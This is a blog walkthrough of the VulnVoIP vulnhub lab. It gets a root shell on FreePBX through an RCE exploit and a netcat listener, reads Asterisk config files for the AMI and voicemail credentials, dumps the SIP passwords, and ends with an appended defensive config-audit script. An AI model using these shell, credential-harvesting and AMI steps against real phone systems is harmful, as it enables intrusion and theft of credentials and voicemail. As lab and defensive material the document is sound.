Monday, June 12, 2017

HackLAB: VulnVoIP Walkthru


I found this vulnhub challenge rather unique, mainly because it is a VoIP box waiting to be 0wned. You don't see many of these around, so I got down and dirty with the fun stuff :-)

My approach is slightly different from the other walkthrus as I did not use the SIPVicious toolset. Instead, I owned the box pretty fast after discovering it's vulnerable to an RCE condition. The exploit worked with very little modification to its original code.

In case anyone is interested, you can download the VulnVoIP VM here.

1. Nmap output: 
 

2. Browsing to http://192.168.0.168/recordings/index.php shows FreePBX ver 2.5.

 
3. Download the FreePBX exploit.

4(a). Set up a netcat listener to catch the shell:

# nc -nlvp 443
listening on [any] 443 ...

4(b). Modify the sploit to use http instead of https, configure the rhost and lhost, then execute it:
5. Catch the shell and spawn a proper TTY using python: 
listening on [any] 443 ...
connect to [192.168.0.182] from (UNKNOWN) [192.168.0.168] 50752
id
uid=0(root) gid=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
bash-3.2# id
id
uid=0(root) gid=0(root)
bash-3.2# 

6. Get the asterisk password using the spawned shell:

bash-3.2# cat /etc/asterisk/manager.conf
cat /etc/asterisk/manager.conf
;
; AMI - Asterisk Manager interface
;
; FreePBX needs this to be enabled. Note that if you enable it on a different IP, you need
; to assure that this can't be reached from un-authorized hosts with the ACL settings (permit/deny).
; Also, remember to configure non-default port or IP-addresses in amportal.conf.
; 
; The AMI connection is used both by the portal and the operator's panel in FreePBX.
;
; FreePBX assumes an AMI connection to localhost:5038 by default.
;
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0

[admin]
secret = amp111
deny=
permit=0.0.0.0/0.0.0.0
read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate

#include manager_additional.conf
#include manager_custom.conf 
<--snip---snip-->

7. Log in to the Asterisk manager interface (AMI, port 5038) using 'admin' with password 'amp111':

# telnet 192.168.0.168 5038
Trying 192.168.0.168...
Connected to 192.168.0.168.
Escape character is '^]'.
Asterisk Call Manager/1.1
ACTION: LOGIN
USERNAME: admin
SECRET: amp111
EVENTS: ON

Response: Success
Message: Authentication accepted
 
8. Enumerate the SIP users:

action: command
command: sip show users

Response: Follows
Privilege: Command
Username                   Secret           Accountcode      Def.Context      ACL  NAT       
100                                                          from-internal    Yes  Always    
101                        s3cur3                            from-internal    Yes  Always    
102                        letmein123                        from-internal    Yes  Always    
201                        secret123                         from-internal    Yes  Always    
200                        quit3s3curE123                    from-internal    Yes  Always    
2000                       password123                       from-internal    Yes  Always    
--END COMMAND--

9. Look for voicemail:

action: VoicemailUsersList 

Response: Success
Message: Voicemail user list will follow

Event: VoicemailUserEntry
VMContext: default
VoiceMailbox: 2000
Fullname: Support
Email: 
Pager: 
ServerEmail: 
MailCommand: 
Language: 
TimeZone: 
Callback: 
Dialout: 
UniqueID: 
ExitContext: 
SayDurationMinimum: 2
SayEnvelope: No
SayCID: No
AttachMessage: No
AttachmentFormat: 
DeleteMessage: No
VolumeGain: 0.00
CanReview: Yes
CallOperator: Yes
MaxMessageCount: 100
MaxMessageLength: 0
NewMessageCount: 1

Event: VoicemailUserEntryComplete

10(a). Using any VoIP client, configure it for SIP: 2000@192.168.0.168 pass: password123
10(b). Place a call to SIP 2000 and listen for voicemail! ;-) It's engaged! Of course, because
I'm dialing my own number. Now, figure out how to retrieve my own voicemail box.
11. After a little googling for 'asterisk voicemail retrieval number', I found that it can be accessed by pressing *98.
Later I found that you can actually press * too.

12. The voicemail box requires a password!!! Using the existing shell, I searched /etc/asterisk/voicemail.conf for it:

bash-3.2# pwd
pwd
/etc/asterisk
bash-3.2# ls voicemail*
ls voicemail*
voicemail.conf voicemail.conf.template
bash-3.2# cat voicemail.conf
cat voicemail.conf
[general]
#include vm_general.inc
#include vm_email.inc
[default]

2000 => 0000,Support,,,attach=no|saycid=no|envelope=no|delete=no
bash-3.2# 

13. Listen to the voicemail to retrieve the password 'securesupport123'!
14. Mission accomplished, root dance! :-)
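As an added defensive check (my own code, not part of the original post or the VulnVoIP VM), here is a small audit script that parses the two Asterisk config files dumped in steps 6 and 12 and flags the settings this walkthrough leaned on: the FreePBX default AMI secret, the any-host manager ACL, the 'command' write class that allowed 'sip show users' over AMI, and the all-zeros voicemail PIN. The sample configs are constructed, trimmed copies of what the shell output above shows.

```python
import re

# Constructed sample input modelled on the files dumped in steps 6 and 12 (trimmed, not the VM's own files).
MANAGER_CONF = """; AMI - Asterisk Manager interface
[general]
[admin]
secret = amp111
deny=
permit=0.0.0.0/0.0.0.0
write = system,call,log,verbose,command,agent,user,config,originate
#include manager_additional.conf
"""
VOICEMAIL_CONF = "[default]\n2000 => 0000,Support,,,attach=no|saycid=no|envelope=no|delete=no\n"

def parse_asterisk_conf(text):
    # Asterisk's INI-like format: [section], 'key = value' or 'key => value', ';' comments; '#include' skipped.
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("#include"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = sections.setdefault(line[1:-1], {})
            continue
        m = re.match(r"^([^=]+?)\s*=>?\s*(.*)$", line)
        if m and current is not None:
            current[m.group(1)] = m.group(2)
    return sections

def audit_manager(conf):
    # Flags what steps 6-8 relied on: FreePBX default secret, any-host ACL, 'command' write class (CLI over AMI).
    findings = []
    for user, sec in conf.items():
        if sec.get("secret") == "amp111":
            findings.append(f"{user}: FreePBX default AMI secret")
        if sec.get("permit", "").startswith("0.0.0.0/0.0.0.0"):
            findings.append(f"{user}: ACL permits any source address")
        if "command" in sec.get("write", "").split(","):
            findings.append(f"{user}: 'command' write class allows CLI commands over AMI")
    return findings

def audit_voicemail(conf):
    # Mailbox lines are 'box => pin,name,...'; flag short, repeated-digit or box-number PINs.
    findings = []
    for ctx, boxes in conf.items():
        for box, spec in boxes.items():
            pin = spec.split(",", 1)[0]
            if ctx != "general" and (len(pin) < 4 or len(set(pin)) == 1 or pin == box):
                findings.append(f"{box}@{ctx}: weak voicemail PIN")
    return findings
```

Run it against the real /etc/asterisk/manager.conf and voicemail.conf on a FreePBX host; an empty result from both functions means none of the settings abused in this walkthrough are present.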
